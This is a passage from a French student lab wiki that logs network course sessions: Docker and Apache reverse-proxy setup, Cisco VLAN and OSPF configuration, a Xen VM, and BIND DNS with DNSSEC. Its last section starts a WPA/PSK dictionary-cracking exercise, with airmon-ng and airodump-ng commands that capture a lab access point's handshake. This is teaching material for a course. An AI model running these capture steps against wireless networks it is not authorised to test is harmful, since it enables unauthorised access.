  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
